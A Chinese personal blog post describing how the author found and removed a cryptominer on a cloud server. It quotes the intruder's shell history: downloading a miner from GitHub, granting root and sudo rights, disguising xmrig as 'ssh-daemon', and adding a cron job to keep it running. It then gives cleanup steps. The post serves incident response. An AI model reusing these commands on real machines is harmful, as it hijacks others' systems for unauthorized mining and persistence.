挖矿程序入侵解决方案

本人自己购买了一台阿里云服务器来玩，晚上收到被挖矿机程序入侵，处理过程大概是这样的使用top命令查看看那些进程是陌生的并且占用大量cpu，因为是挖矿机肯定会占用很多cpu，先不要着急kill掉，因为一般都会重启启动的，我用history（也可以查看～/.bash_history文件）查看历史命令发现如下内容(我手敲的代码，可能有个别手误，网页端不能copy)，这个是入侵系统的脚本，从中可以看出些端倪

yun install htop vim locate nano tmux git -y
apt-get intsall htop vim locate nano tmux git -y
git clone https://github.com/EVECloud/EVE_Miner_Tools
usermod -aG wheel cronjob
usermod -aG root cronjob
echo '%wheel' ALL=(ALL)    ALL' >> 'etc/suduers'
mkdir /opt
cd /opt
git clone https://githu.com/lotus1314/xmrig nginx-0.12
cd nginx-0.12
mv xmrig ssh-daemon
chomd +x ssh-daemon
rm -rf config.json
nano config.json
cat <(crontab -l) <(echo '****/bin/sh -c "/sbin/pidof ssh-daemon || nohup /opt/nginx-0.12/ssh-daemon &> /opt/nginx-0.12/log.txt $"') | crontab -

首先是安装了一些挖矿需要的软件，然后写入到crontab 定时任务里，这时候我们需要做的是先把定时任务里的命令删除掉

使用crontab -e 命令编辑文件，把****/bin/sh -c "/sbin/pidof ssh-daemon || nohup /opt/nginx-0.12/ssh-daemon &> /opt/nginx-0.12/log.txt $"' 删掉

然后使用如下命令 ssh-daemon替换为你top发现的那个异常进程名

ps -ef | grep ssh-daemon | grep -v grep | awk '{print $2}' | xargs kill -9

 

然后在删除脚本安装的那些个程序。

我也不清楚它是通过那个系统漏洞入侵的系统，所以我的方案是防火墙禁止访问github，以防它在此入侵破坏我的应用